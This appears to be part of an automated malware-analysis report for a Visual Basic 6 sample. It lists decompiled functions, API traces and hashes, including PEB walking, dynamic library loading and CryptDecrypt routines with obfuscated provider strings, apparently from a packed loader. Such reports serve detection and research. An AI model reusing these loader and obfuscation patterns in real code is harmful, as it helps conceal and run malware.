                                                                                                                                                        0x004016d3
                                                                                                                                                        0x004016d5
                                                                                                                                                        0x004016d7
                                                                                                                                                        0x004016d9
                                                                                                                                                        0x004016db
                                                                                                                                                        0x004016dd
                                                                                                                                                        0x004016df
                                                                                                                                                        0x004016e1
                                                                                                                                                        0x004016e3
                                                                                                                                                        0x004016e5
                                                                                                                                                        0x004016e7
                                                                                                                                                        0x004016e7
                                                                                                                                                        0x00401488
                                                                                                                                                        0x0040148a
                                                                                                                                                        0x0040148b
                                                                                                                                                        0x0040148c
                                                                                                                                                        0x0040148f
                                                                                                                                                        0x00401495
                                                                                                                                                        0x00401499
                                                                                                                                                        0x0040149e
                                                                                                                                                        0x004014a0
                                                                                                                                                        0x004014a1
                                                                                                                                                        0x004014a2
                                                                                                                                                        0x004014a8
                                                                                                                                                        0x004014ac
                                                                                                                                                        0x004014ad
                                                                                                                                                        0x004014b1
                                                                                                                                                        0x004014b3
                                                                                                                                                        0x004014b5
                                                                                                                                                        0x004014b9
                                                                                                                                                        0x004014bc
                                                                                                                                                        0x004014be
                                                                                                                                                        0x004014c0
                                                                                                                                                        0x004014c0
                                                                                                                                                        0x004014c2
                                                                                                                                                        0x004014c3
                                                                                                                                                        0x004014c6
                                                                                                                                                        0x004014c7
                                                                                                                                                        0x004014cd
                                                                                                                                                        0x004014ce
                                                                                                                                                        0x004014cf
                                                                                                                                                        0x004014d1
                                                                                                                                                        0x004014d4
                                                                                                                                                        0x004014db
                                                                                                                                                        0x004014dd
                                                                                                                                                        0x004014df
                                                                                                                                                        0x004014e1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004014e1
                                                                                                                                                        0x00401356
                                                                                                                                                        0x00401356
                                                                                                                                                        0x00401358
                                                                                                                                                        0x00401359
                                                                                                                                                        0x0040135e
                                                                                                                                                        0x0040135f
                                                                                                                                                        0x00401362
                                                                                                                                                        0x00401364
                                                                                                                                                        0x00401365
                                                                                                                                                        0x00401365

                                                                                                                                                        APIs
                                                                                                                                                        • #100.MSVBVM60(VB5!6&VB6DE.DLL), ref: 00401221
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: #100
                                                                                                                                                        • String ID: VB5!6&VB6DE.DLL
                                                                                                                                                        • API String ID: 1341478452-1903704572
                                                                                                                                                        • Opcode ID: 9d63552e758ea68c125351f945aa378511766dbbc5d3d0b42d9f808e2a0998ac
                                                                                                                                                        • Instruction ID: 4be22af98733251b43131ef4de9ce4f0dbf74689f7b9a24d1b736262dd1b8964
                                                                                                                                                        • Opcode Fuzzy Hash: 9d63552e758ea68c125351f945aa378511766dbbc5d3d0b42d9f808e2a0998ac
                                                                                                                                                        • Instruction Fuzzy Hash: 26011F6248E7C24FD7474B714D62585BFB0AE2325431B01DBC4C1CF4A3E158589AC767
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004251CF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E004251CF(WCHAR* _a4) {
				intOrPtr _t2;
				struct HINSTANCE__* _t4;
				intOrPtr _t6;

				if( *0x599008 != 0) {
					L13:
					_t4 = LoadLibraryW(_a4); // executed
					return _t4;
				}
				if( *0x599000 != 0) {
					L5:
					if( *0x599008 != 0) {
						L9:
						if( *0x599004 != 0) {
							goto L13;
						}
						E0042502F(_t2, 0x4249ed);
						_t6 = E00425271( *0x599000, "SysAllocStringByteLen");
						if(_t6 != 0) {
							 *0x599004 = _t6;
							goto L13;
						}
						return _t6;
					}
					E0042502F(_t2, 0x424997);
					_t2 = E00425271( *0x599000, "SysAllocStringByteLen");
					if(_t2 != 0) {
						 *0x599008 = _t2;
						goto L9;
					}
					return _t2;
				}
				E0042500D(_t2, 0x4249fc);
				_t2 = E004252D0("SysAllocStringByteLen");
				if(_t2 != 0) {
					 *0x599000 = _t2;
					goto L5;
				}
				return _t2;
			}






                                                                                                                                                        0x004251d9
                                                                                                                                                        0x00425263
                                                                                                                                                        0x0042526b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0042526b
                                                                                                                                                        0x004251e6
                                                                                                                                                        0x00425207
                                                                                                                                                        0x0042520e
                                                                                                                                                        0x00425235
                                                                                                                                                        0x0042523c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00425243
                                                                                                                                                        0x00425253
                                                                                                                                                        0x0042525a
                                                                                                                                                        0x0042525e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0042525e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0042525a
                                                                                                                                                        0x00425215
                                                                                                                                                        0x00425225
                                                                                                                                                        0x0042522c
                                                                                                                                                        0x00425230
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00425230
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0042522c
                                                                                                                                                        0x004251ed
                                                                                                                                                        0x004251f7
                                                                                                                                                        0x004251fe
                                                                                                                                                        0x00425202
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00425202
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNELBASE(?,?,0042508D,?,?,SysAllocStringByteLen,000000FF,00424A5A), ref: 0042526B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: SysAllocStringByteLen
                                                                                                                                                        • API String ID: 1029625771-3231582829
                                                                                                                                                        • Opcode ID: ec43dba8d042c8725404efdd791ffa6846c28efd74de005100d7bdcda423f6b6
                                                                                                                                                        • Instruction ID: 6f010890d33a4258a2eabeaf63635834bff53dfde59d16cad3fb0b501b35fee7
                                                                                                                                                        • Opcode Fuzzy Hash: ec43dba8d042c8725404efdd791ffa6846c28efd74de005100d7bdcda423f6b6
                                                                                                                                                        • Instruction Fuzzy Hash: 1F014F30705A34DADF106B69FC0A72636A4B730708FD140AFA825911E1F77D4898EE6E
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00427AD0, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00427AD0(void* __ebx, void* __edi, void* __esi, void* __ebp) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void _v16;
				void _v20;
				char _v24;
				intOrPtr _v28;
				void* _t18;

				_v12 = 0;
				_v16 = 0;
				_v4 = 0;
				_v8 = 0;
				_v20 = E00426940(0x4291b0);
				RtlMoveMemory( &_v16,  &_v20, 4);
				_v24 = _v28 + 0xfffffffc;
				_v20 = _v16 + 4;
				_t18 = E00428DE0(__ebx, __edi, __esi,  &_v20,  &_v24); // executed
				return _t18;
			}











                                                                                                                                                        0x00427ada
                                                                                                                                                        0x00427ade
                                                                                                                                                        0x00427ae2
                                                                                                                                                        0x00427ae6
                                                                                                                                                        0x00427af5
                                                                                                                                                        0x00427aff
                                                                                                                                                        0x00427b17
                                                                                                                                                        0x00427b21
                                                                                                                                                        0x00427b25
                                                                                                                                                        0x00427b2d

                                                                                                                                                        APIs
                                                                                                                                                        • RtlMoveMemory.KERNEL32(00000004,004291B0,00000004,004291B0,?,?,?,00426081), ref: 00427AFF
                                                                                                                                                          • Part of subcall function 00428DE0: #685.MSVBVM60(?,66106AEE,660DDE99,660DC30A), ref: 00428E40
                                                                                                                                                          • Part of subcall function 00428DE0: __vbaObjSet.MSVBVM60(?,00000000), ref: 00428E4B
                                                                                                                                                          • Part of subcall function 00428DE0: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403088,00000044), ref: 00428E9C
                                                                                                                                                          • Part of subcall function 00428DE0: __vbaFreeObj.MSVBVM60 ref: 00428EA5
                                                                                                                                                          • Part of subcall function 00428DE0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00428EBD
                                                                                                                                                          • Part of subcall function 00428DE0: RtlFillMemory.KERNEL32 ref: 00428ECA
                                                                                                                                                          • Part of subcall function 00428DE0: #644.MSVBVM60(00401006), ref: 00428EDA
                                                                                                                                                          • Part of subcall function 00428DE0: #644.MSVBVM60(?,00000000,00000008), ref: 00428EF0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$#644FreeMemory$#685CheckFillHresultListMove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 119380213-0
                                                                                                                                                        • Opcode ID: adb1b5586966f75aea4b8ac7337c5e1af14e2221363014be9854136a884c4f6e
                                                                                                                                                        • Instruction ID: fe00c0e69180b76124c3c0fd137d799ff8fcf0ce22873f993c267e7c62ad9c69
                                                                                                                                                        • Opcode Fuzzy Hash: adb1b5586966f75aea4b8ac7337c5e1af14e2221363014be9854136a884c4f6e
                                                                                                                                                        • Instruction Fuzzy Hash: 00F0F4B5908301AFD300EF28D945A6BBBE0FB84614F40CE1EB49883250E734D908CB42
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00426ED0, Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 170encryptionCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • #644.MSVBVM60(00000000,660DC6FC,00000000,660DC6D9,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F11
                                                                                                                                                        • __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F1F
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F30
                                                                                                                                                        • __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F38
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F43
                                                                                                                                                        • __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F4B
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F56
                                                                                                                                                        • #644.MSVBVM60(00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F59
                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F65
                                                                                                                                                        • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F82
                                                                                                                                                        • #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F96
                                                                                                                                                        • __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FA4
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FAF
                                                                                                                                                        • __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FB7
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FC2
                                                                                                                                                        • __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FCA
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FD5
                                                                                                                                                        • #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FD8
                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00426FE4
                                                                                                                                                        • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00427001
                                                                                                                                                        • #644.MSVBVM60(00000000), ref: 00427015
                                                                                                                                                          • Part of subcall function 00428560: __vbaStrCopy.MSVBVM60(660E6C30,00000000,660DDE99), ref: 004285A0
                                                                                                                                                          • Part of subcall function 00428560: #653.MSVBVM60(?,?), ref: 004285BB
                                                                                                                                                          • Part of subcall function 00428560: __vbaI4Var.MSVBVM60(?), ref: 004285C5
                                                                                                                                                          • Part of subcall function 00428560: __vbaFreeVar.MSVBVM60 ref: 004285DB
                                                                                                                                                          • Part of subcall function 00428560: __vbaStrMove.MSVBVM60(?,?,00000001,?), ref: 00428601
                                                                                                                                                          • Part of subcall function 00428560: __vbaStrCat.MSVBVM60(00000000), ref: 00428604
                                                                                                                                                          • Part of subcall function 00428560: __vbaStrMove.MSVBVM60 ref: 0042860F
                                                                                                                                                          • Part of subcall function 00428560: __vbaFreeStr.MSVBVM60 ref: 00428614
                                                                                                                                                          • Part of subcall function 00428560: __vbaFreeStr.MSVBVM60(00428651), ref: 0042864A
                                                                                                                                                        • __vbaStrMove.MSVBVM60(M}i}c}r}o}s}o}f}t} }E}n}h}a}n}c}e}d} }R}S}A} }a}n}d} }A}E}S} }C}r}y}p}t}o}g}r}a}p}h}i}c} }P}r}o}v}i}d}e}r} }(}P}r}o}t}o}t}y}p}e})}), ref: 00427028
                                                                                                                                                        • #644.MSVBVM60(00000000), ref: 0042702B
                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000), ref: 00427037
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00427049
                                                                                                                                                        • #644.MSVBVM60(00000000), ref: 00427056
                                                                                                                                                        • __vbaStrMove.MSVBVM60(M}i}c}r}o}s}o}f}t} }E}n}h}a}n}c}e}d} }R}S}A} }a}n}d} }A}E}S} }C}r}y}p}t}o}g}r}a}p}h}i}c} }P}r}o}v}i}d}e}r} }(}P}r}o}t}o}t}y}p}e})}), ref: 00427069
                                                                                                                                                        • #644.MSVBVM60(00000000), ref: 0042706C
                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00427078
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042708A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Move$#644$Free$AcquireContextCrypt$List$#653Copy
                                                                                                                                                        • String ID: Enhanced R$Microsoft$M}i}c}r}o}s}o}f}t} }E}n}h}a}n}c}e}d} }R}S}A} }a}n}d} }A}E}S} }C}r}y}p}t}o}g}r}a}p}h}i}c} }P}r}o}v}i}d}e}r} }(}P}r}o}t}o}t}y}p}e})}$SA and AES Cryptogra$phic Provider
                                                                                                                                                        • API String ID: 3098114173-4167083701
                                                                                                                                                        • Opcode ID: 261925df384d8f51a9cd60a392a113204c8db72c3ea9f84c00dcc7bb05c10871
                                                                                                                                                        • Instruction ID: 0210659929232160ba3bc7fec310dafb1ccc22026e44e660eca860e00c324a1f
                                                                                                                                                        • Opcode Fuzzy Hash: 261925df384d8f51a9cd60a392a113204c8db72c3ea9f84c00dcc7bb05c10871
                                                                                                                                                        • Instruction Fuzzy Hash: 155141B2A40218ABDB109BB1DD4EFFF7A78EB55B41F114216E502F71C0EE785D09CAA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00426B80, Relevance: 37.7, APIs: 25, Instructions: 247encryptionCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaStrVarCopy.MSVBVM60(?,660DC6D9,660DC6FC,?,660DC6D9), ref: 00426BF3
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 00426BFE
                                                                                                                                                          • Part of subcall function 00426ED0: #644.MSVBVM60(00000000,660DC6FC,00000000,660DC6D9,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F11
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F1F
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F30
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F38
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F43
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F4B
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F56
                                                                                                                                                          • Part of subcall function 00426ED0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F59
                                                                                                                                                          • Part of subcall function 00426ED0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F65
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F82
                                                                                                                                                          • Part of subcall function 00426ED0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F96
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FA4
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FAF
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FB7
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FC2
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FCA
                                                                                                                                                          • Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FD5
                                                                                                                                                          • Part of subcall function 00426ED0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FD8
                                                                                                                                                          • Part of subcall function 00426ED0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00426FE4
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000), ref: 00426C1D
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00426C46
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426C76
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426C92
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426CB2
                                                                                                                                                        • #644.MSVBVM60(?), ref: 00426CB8
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426CDC
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00426D02
                                                                                                                                                        • __vbaLenBstrB.MSVBVM60(?,00000000), ref: 00426D0D
                                                                                                                                                        • CryptHashData.ADVAPI32(?,?,00000000), ref: 00426D1C
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000), ref: 00426D33
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00426D66
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426D9A
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00426DBD
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426DE1
                                                                                                                                                        • #644.MSVBVM60(?), ref: 00426DE7
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00426E0B
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00426E31
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,660DC6D9), ref: 00426E3C
                                                                                                                                                        • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00401006,?), ref: 00426E5A
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 00426E64
                                                                                                                                                        • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00426E7F
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(00426EB7), ref: 00426EB0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Move$#644$Crypt$RedimZero$AcquireContextEraseFree$BstrCopyDataDecryptHashListLockPreserveUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2077137070-0
                                                                                                                                                        • Opcode ID: ba557621de5b60468b549ce4b184b2171207c1677e09ddf35350fd33daf5083a
                                                                                                                                                        • Instruction ID: 94a9495e6d43ab2a0752245c38e04e78d97bedb260e9a52f18f1432f56f3d2ee
                                                                                                                                                        • Opcode Fuzzy Hash: ba557621de5b60468b549ce4b184b2171207c1677e09ddf35350fd33daf5083a
                                                                                                                                                        • Instruction Fuzzy Hash: 86B13DB4910218DFDB18DFA8D898EEEBBB5FF48314F11811AE505AB351DB74A909CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00424F75, Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                        			E00424F75() {
				intOrPtr _t7;
				void* _t10;
				void* _t12;
				intOrPtr* _t13;
				intOrPtr _t16;

				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				_t16 = _t7;
				while(_t16 != _t7) {
					_push(_t7);
					_t10 = E00425366( *((intOrPtr*)(E0042500D(_t7, 0x424a16) + 0x30)), "SysAllocStringByteLen", 7);
					if(_t10 != 0) {
						_t12 = E00425366( *((intOrPtr*)(E0042500D(_t10, 0x424a2e) + 0x30)), "SysAllocStringByteLen", 7);
						if(_t12 != 0) {
							_pop(_t13);
							_t7 =  *_t13;
							continue;
						}
						return _t12 + 1;
					}
					return _t10 + 1;
				}
				return 0;
			}








                                                                                                                                                        0x00424f7e
                                                                                                                                                        0x00424f81
                                                                                                                                                        0x00424f83
                                                                                                                                                        0x00424f87
                                                                                                                                                        0x00424f9c
                                                                                                                                                        0x00424fa4
                                                                                                                                                        0x00424fbd
                                                                                                                                                        0x00424fc5
                                                                                                                                                        0x00424fca
                                                                                                                                                        0x00424fcb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00424fcb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00424fc7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00424fa6
                                                                                                                                                        0x00000000

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: SysAllocStringByteLen
                                                                                                                                                        • API String ID: 0-3231582829
                                                                                                                                                        • Opcode ID: 026bb01e993c00d7edc135f87e1317c0aced75b47b0b2baf6f780ac441a47fc4
                                                                                                                                                        • Instruction ID: a57cf6101c4c0e494f37c0e7fe494f1dfc905fadb8e01e2589046a50762449ea
                                                                                                                                                        • Opcode Fuzzy Hash: 026bb01e993c00d7edc135f87e1317c0aced75b47b0b2baf6f780ac441a47fc4
                                                                                                                                                        • Instruction Fuzzy Hash: 26F0E530794230EEDE21E624FE42F253698FBC4B54FE2146BF402DB6A2D66DD841911D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0221115B, Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.361003660.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: "
                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                        • Opcode ID: 433f9975cace59ec36b7c41582441029428dae2aacb2bb28eca78caa18bfa5be
                                                                                                                                                        • Instruction ID: 072aaf8b1b019b3ae140adc129de20c3b084c081a335a5fd24f956f287a652bd
                                                                                                                                                        • Opcode Fuzzy Hash: 433f9975cace59ec36b7c41582441029428dae2aacb2bb28eca78caa18bfa5be
                                                                                                                                                        • Instruction Fuzzy Hash: 4BE06D30225301DFD729CF14C964B26B3F4FB91314F10C56DE2694B6A4C731D851CB12
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0221093A, Relevance: .1, Instructions: 142COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.361003660.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: dd15a8373ca6c3011468e14a31e3fd7aa740775d731f17b81693ca69dc3c086f
                                                                                                                                                        • Instruction ID: 8d420d26df91d35a21e66faf7cc21de8b056c510db7f758844e63038eb6c217a
                                                                                                                                                        • Opcode Fuzzy Hash: dd15a8373ca6c3011468e14a31e3fd7aa740775d731f17b81693ca69dc3c086f
                                                                                                                                                        • Instruction Fuzzy Hash: 2D512278231782DFC315DB61C9A0F3973F6FBA5648F14047CDC069AA89DB36A642DE10
                                                                                                                                                        Uniqueness

